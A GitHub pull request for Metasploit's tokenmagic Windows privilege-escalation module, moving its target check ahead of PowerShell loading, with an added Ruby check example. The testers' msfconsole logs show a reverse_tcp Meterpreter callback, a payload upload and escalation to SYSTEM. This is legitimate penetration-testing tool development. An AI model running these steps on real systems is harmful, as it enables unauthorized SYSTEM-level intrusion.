Update check method and move it to earlier in the module #15223

Merged: 1 commit, May 24, 2021

Conversation

bwatters-r7 (Contributor) commented May 19, 2021

It turns out that while this technique should work on Windows 7 SP0, the act of loading our PowerShell module seems to crash the targets I'm testing. Regardless, we should not have loaded the PowerShell module before executing the check method. That was likely my fault.

No one else has verified this behavior, but I built a second target and it behaved in the exact same manner. Based on that, I updated the check method, and moved it before the PowerShell loading call.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • set method service
  • get a default user meterpreter session on a Windows 7 SP0 target
  • use exploit/windows/local/tokenmagic
  • set session x
  • run
  • Verify the check method tells you no, and the session remains intact
  • set method dll
  • Verify the check method tells you no, and the session remains intact
  • get a default user meterpreter session on a Windows 7 sp1 target
  • set method service
  • run
  • feel victorious about your new, shiny SYSTEM-level session.
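The engineering point of this PR is ordering: a check that only reads information already in the session must run before the module loads anything onto the host, so a mis-targeted run ends with "not-vulnerable" and the session stays intact. The following is an added example in plain Ruby, not code from the tokenmagic module or from Metasploit; it parses the sysinfo lines quoted in this PR and gates on them. The service-pack rule and the "6.1 kernel only" scope are assumptions made for the illustration, since the module's real check criteria are not shown on this page.

```ruby
# Added example, not the tokenmagic module's own code: a side-effect-free target
# check that runs before anything is loaded onto the host. The service-pack rule
# and the version scope are assumptions made for this illustration.

# Sample sysinfo output, copied from the Meterpreter sessions quoted in this PR.
SAMPLE_SP0 = <<~SYSINFO
  Computer        : WIN-J5JFRK4NUUD
  OS              : Windows 7 (6.1 Build 7600).
  Architecture    : x64
SYSINFO

SAMPLE_SP1 = <<~SYSINFO
  Computer        : WIN-EV41RSSPETD
  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
  Architecture    : x64
SYSINFO

# Matches the "Windows <product> (<major>.<minor> Build <build>[, Service Pack <n>])" form.
OS_LINE = /Windows (?<product>[\w ]+?) \((?<major>\d+)\.(?<minor>\d+) Build (?<build>\d+)(?:, Service Pack (?<sp>\d+))?\)/

# Parse the "OS" line of sysinfo into its version components. Returns nil when
# the line is missing or is not a Windows version string of that shape.
def parse_os_line(sysinfo)
  os_line = sysinfo.lines.find { |l| l.start_with?('OS') }
  return nil unless os_line
  m = OS_LINE.match(os_line)
  return nil unless m
  {
    product: m[:product],
    version: "#{m[:major]}.#{m[:minor]}",
    build: m[:build].to_i,
    sp: (m[:sp] || 0).to_i # no "Service Pack" suffix means SP0
  }
end

# Three-valued outcome mirroring the messages msfconsole prints in this PR:
#   :appears -> "The target appears to be vulnerable."
#   :safe    -> "not-vulnerable: The target is not exploitable."
#   :unknown -> the check could not decide.
# This only reads data already in the session; nothing is written or executed remotely.
def check_target(sysinfo)
  info = parse_os_line(sysinfo)
  return :unknown if info.nil?
  return :safe unless info[:version] == '6.1' # assumption: only the 6.1 kernel is in scope
  return :safe if info[:sp] < 1                # assumption: SP0 treated as not exploitable (the crash this PR works around)
  :appears
end

# The ordering this PR establishes: run the check first and return before any
# PowerShell module or payload would be loaded. ForceExploit bypasses the check,
# as the msfconsole message says.
def run_module(sysinfo, force_exploit: false)
  result = check_target(sysinfo)
  if result != :appears && !force_exploit
    return 'Exploit aborted due to failure: not-vulnerable: The target is not exploitable.'
  end
  # Only past this point would the module stage anything on the target (omitted here).
  'check passed, proceeding to stage'
end
```

Because the check consumes only the sysinfo the session already returned, an SP0 target takes the early return and the operator keeps the user-level session, which is exactly the behaviour the verification steps above ask a tester to confirm.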

@jheysel-r7

@bwatters-r7 bwatters-r7 added bug easy rn-fix release notes fix labels May 19, 2021
@space-r7 space-r7 self-assigned this May 24, 2021
space-r7 (Contributor)

Worked for me:

SP0
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (200262 bytes) to 192.168.37.1
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.1:50922) at 2021-05-24 13:26:42 -0500

meterpreter > sysinfo
Computer        : WIN-J5JFRK4NUUD
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/tokenmagic
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/tokenmagic) > set session 1
session => 1
msf6 exploit(windows/local/tokenmagic) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(windows/local/tokenmagic) > options

Module options (exploit/windows/local/tokenmagic):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   METHOD            SERVICE          yes       SERVICE or DLL, please select which attack me
                                                thod you would like to use (SERVICE by defaul
                                                t).
Note that the System Orchestrator service
                                                 which loads the overwritten DLL when using t
                                                he DLL method can take up to 10
minutes to tr
                                                igger (Accepted: SERVICE, DLL)
   SERVICE_FILENAME  HdvUou           no        Filename for Service Payload (Random by defau
                                                lt).
   SERVICE_NAME      xCMiJpk          no        Service Name to use (Random by default).
   SESSION           1                yes       The session to run this module on.
   WRITABLE_DIR                       no        Directory to write file to (%TEMP% by default
                                                ).


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, n
                                        one)
   LHOST     192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/tokenmagic) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/tokenmagic) > set method DLL
method => DLL
msf6 exploit(windows/local/tokenmagic) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/tokenmagic) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-J5JFRK4NUUD\space
SP1
meterpreter > sysinfo
Computer        : WIN-EV41RSSPETD
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > previous
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/tokenmagic) > options

Module options (exploit/windows/local/tokenmagic):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   METHOD            DLL              yes       SERVICE or DLL, please select which attack me
                                                thod you would like to use (SERVICE by defaul
                                                t).
Note that the System Orchestrator service
                                                 which loads the overwritten DLL when using t
                                                he DLL method can take up to 10
minutes to tr
                                                igger (Accepted: SERVICE, DLL)
   SERVICE_FILENAME  HdvUou           no        Filename for Service Payload (Random by defau
                                                lt).
   SERVICE_NAME      xCMiJpk          no        Service Name to use (Random by default).
   SESSION           1                yes       The session to run this module on.
   WRITABLE_DIR                       no        Directory to write file to (%TEMP% by default
                                                ).


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, n
                                        one)
   LHOST     192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/tokenmagic) > set method SERVICE
method => SERVICE
msf6 exploit(windows/local/tokenmagic) > set session 2
session => 2
msf6 exploit(windows/local/tokenmagic) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Attempting to PrivEsc on WIN-EV41RSSPETD via session ID: 2
[*] Uploading payload to C:\Users\space\AppData\Local\Temp\HdvUou.exe
[*] Running Exploit on WIN-EV41RSSPETD
[*] Executing TokenMagic PowerShell script
[+] Enjoy the shell!
[*] Sending stage (200262 bytes) to 192.168.37.133
[+] Deleted C:\Users\space\AppData\Local\Temp\HdvUou.exe
[*] Meterpreter session 3 opened (192.168.37.1:4444 -> 192.168.37.133:49159) at 2021-05-24 14:11:17 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-EV41RSSPETD
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows

bwatters-r7 (Contributor, Author)

@space-r7 you rock!
Out of curiosity, could I impose on you to force the exploit on SP0 or test it against the current main branch? I just want to make sure that someone else can recreate the bug this PR is trying to fix.

space-r7 (Contributor)

> @space-r7 you rock!
> Out of curiosity, could I impose on you to force the exploit on SP0 or test it against the current main branch? I just want to make sure that someone else can recreate the bug this PR is trying to fix.

Absolutely!

space-r7 (Contributor)

Is this similar to what you were experiencing? The module hangs for a while, then you eventually receive the session message?

meterpreter > sysinfo
Computer        : WIN-Q3ETOCF474V
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN-Q3ETOCF474V\space
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/tokenmagic 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/tokenmagic) > set session 1
session => 1
msf6 exploit(windows/local/tokenmagic) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(windows/local/tokenmagic) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] 192.168.37.133 - Meterpreter session 1 closed.  Reason: Died


^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted

bwatters-r7 (Contributor, Author)

Yup; that's exactly it. Thanks so much for verifying!

@space-r7 space-r7 merged commit 8e4a33f into rapid7:master May 24, 2021
space-r7 (Contributor) commented May 24, 2021

Release Notes

Updated the exploit/windows/local/tokenmagic module to fix a crash that occurs on some targets, moving the target validation logic to earlier in the module.

@bwatters-r7 bwatters-r7 deleted the update-tokenmagic-check branch October 5, 2021 19:48